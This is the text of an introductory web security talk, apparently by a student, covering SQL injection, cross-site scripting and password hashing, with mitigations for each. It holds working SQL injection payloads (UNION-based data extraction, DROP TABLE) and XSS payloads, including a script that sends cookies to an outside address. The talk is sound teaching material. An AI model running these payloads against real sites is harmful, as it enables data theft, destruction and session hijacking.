Introduction to Web Security YEUK HON WONG @jwxie CUNY City College 

Code ● All code can be found in https://github.com/yeukhon/websec-poc 

I am one of you. Undergraduate in CS. Took CSC 480 with wes in spring. Mozilla Application Security intern in summer 2013. 

Security is hard: No shit. Developers are users too. We have the right to understand security and be aware of the state of the art. 

BIGGER PICTURE: “World's Biggest Data Breaches & Hacks visualization” - http://www.informationisbeautiful.net/visualizations/worlds- biggest-data-breaches-hacks/ 

OWASP Top 10 Lists top 10 application security vulnerability every three years. 

OWASP Top 10 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 

This talk o SQL Injection o Cross-site scripting (XSS) o Password management 

Risks of SQL Injection ● Remains as #1 in the OWASP Top 10. ● Financial and trust loss: – Sensitive data leakage – DoDs attack (usually in form of data loss) 

SQL injection in the news 

How SQL injection works? 

How SQL injection works? GET /users?id=1 GET /users?id=1 SELECT * FROM users WHERE id = 1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=1 and 1=1 SELECT * FROM users WHERE id = 1 and 1=1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=2 and 1=2 SELECT * FROM users WHERE id = 1 and 1=2; None None GET /users?id=1; DROP TABLE users; GET /users?id=1; DROP TABLE users; SELECT * FROM users WHERE id = 1; DROP TABLE users; 

Complex SELECT attr1, attr2 FROM users; SELECT * FROM ranks; SELECT percentage FROM progress; In principle, some of the attrs don't have to be visible to the frontend! attr1 may never be shown to us in the frontend. 

Basic usage of SQL Injections Attacker: 1. /users?id= is exploitable 2. Wants to steal some sensitive data from some table. (Could be a different table or the same table) Tools: 1. error-based attack, and 2. union-based attack. 

UNION UNION combines two SQL queries into a single table of matching rows. Name Amount Alice 100 Bob 101 Name Amount Calvin 102 Derek 103 SELECT * FROM table1 SELECT * FROM table1 UNION UNION SELECT * FROM table2; SELECT * FROM table2; Name Amount Alice 100 Bob 101 Name Amount Alice 100 Bob 101 Calvin 102 Derek 103 

Step 1: Number of attributes Attacker has to find out the number of attributes returned by the SELECT FROM ; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1 GET /users?id=1 UNION ALL SELECT 1 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns') 

Step 1: Number of attributes Attacker has to find out the number of attributes returned by the SELECT FROM ; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1,2 GET /users?id=1 UNION ALL SELECT 1,2 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns') 

Step 1: Number of attributes In this case we know there are three attributes returned. That's good enough; the attacker doesn't need to know there are exactly or more than three attributes in a table. GET /users?id=1 UNION ALL SELECT 1,2,3 GET /users?id=1 UNION ALL SELECT 1,2,3 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2,3; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8') ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8') 

Step 2: Find a table to query The attacker also doesn't know what tables are available in a database. To do this, find out the version. In this case, this is a MySQL 5.5.34 server. GET /users?id=1 UNION ALL SELECT @@version,2,3 GET /users?id=1 UNION ALL SELECT @@version,2,3 SELECT * FROM users WHERE id = 1 UNION ALL @@version 1,2,3; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('5.5.34-0ubuntu0.12.04.1', '2', '3')) ('5.5.34-0ubuntu0.12.04.1', '2', '3')) 

Step 2: Find a table to query For MySQL > 5, we can do this to find tables: GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables SELECT * FROM users WHERE id = 1 UNION SELECT 1,2, table_name FROM information_schema.tables; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), ….. ….. (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users')) (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users')) 

Step 3: Find columns in a table We are targeting at exercises, find all its columns? GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns SELECT * FROM users WHERE id = 11 UNION SELECT 1, 2, column_name FROM information_schema.columns; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'DEFAULT_COLLATE_NAME') (1L, '2', 'DEFAULT_COLLATE_NAME') ….. ….. ((1L, '2', 'exercise_name'), (1L, '2', 'exercises')) ((1L, '2', 'exercise_name'), (1L, '2', 'exercises')) 

Step 3: Get exercises out We know there is a second table exercises and we know some interesting columns... Bonus: imagine legitimate query never asks for the hash, we can use UNION to look for the hash :) GET /users?id=1 UNION SELECT exercise_name, null, null from exercises GET /users?id=1 UNION SELECT exercise_name, null, null from exercises UNION SELECT exercise_name, null, null from exercises; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('exercise_name_1', None, None)) ('exercise_name_1', None, None)) 

Mitigations ● Sanitize user inputs. Escape. ● Don't construct SQL queries by string concatenations ● If you have to, somehow, use parameterize function provided by the database driver. This is usually known as the “prepared” statement. ● Use ORM. (Rail, Django ORM, SQLAlchemy are good) 

Cross-site scripting (XSS) 

XSS ● XSS deals with scripting – to be exact Javascript, HTML and CSS. ● I consider this the most common, the cheapest vulnerability. – Personal, school and corporate websites are almost always vulnerable. 

Risks of XSS ● Loading malicious code. ● Phishing attacks – Iframe attack – Clickjacking ● Redirect attack ● Cookie stealing 

Types of XSS ● Reflected XSS – Injecting Javascript into a URL ● Stored/Persistent XSS – Injected Javascript is loaded from database ● DOM-based XSS – Rewrite DOM using either method from above 

Reflected XSS ● Attacker injects some script (JS, HTML or CSS) and the input is reflected in the URL and in the document. 

HTML with Reflected XSS Input

This is some h1 title

into the search bar. GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E 

Iframe with Reflected XSS We can create an iframe in the current document. GET /xss?search= height="100%" width="30%"> 

Redirect with Reflected XSS On loading the document we can tell the DOM to jump to another website. Attacker can create a forged login page and make victim think he or she is still on the legitimate login page. GET /xss?search=document.location.href=" GET /xss?search=<script>document.location.href="http://google.com http://google.com" " 

Cookie Stealing with Reflected XSS Under browser's Same Origin Policy, we can make GET request. Attacker make a request to attacker's url in the background using XSS and append cookie to the request. GET /xss?search= GET /xss?search=<script> xhr=new XMLHttpRequest(); xhr=new XMLHttpRequest(); xhr.open("GET","http://192.168.33.60:8081/?cookie=" + xhr.open("GET","http://192.168.33.60:8081/?cookie=" + document.cookie,true); document.cookie,true); xhr.send(); xhr.send(); 

Stored XSS Inject code into the database, the application doesn't escape the output so browser reads the code as it is (like valid HTML). This is much more serious – imagine someone posted a comment with XSS in a bulletin board. 

XSS Mitigations 1. Sanitize input code by means of escaping characters. For example use JSON to serialize input and output. 2. Cookies should be set to secure only flag and HTTPS only. So stealing cookies using XSS is not possible. 3. Avoid running arbitrary user code in HTML. For example, don't turn off safe string in Django's template. 4. Add Content-Security-Policy which prevents inline script and style. 

Password 

Hashing algorithms ● Cryptographically strong hashing algorithms ● Fast hashing vs work-factor hashing ● MD5 – broken ● SHA family (use SHA2) ● Bcrypt vs scrypt vs PBKDF2 

Cost to break 

Don't ask for password Even big companies get it wrong... Adopt Mozilla Persona.... 

Questions? @jwxie github.com/yeukhon speakerdeck.com/yeukhon 

:p Thank you!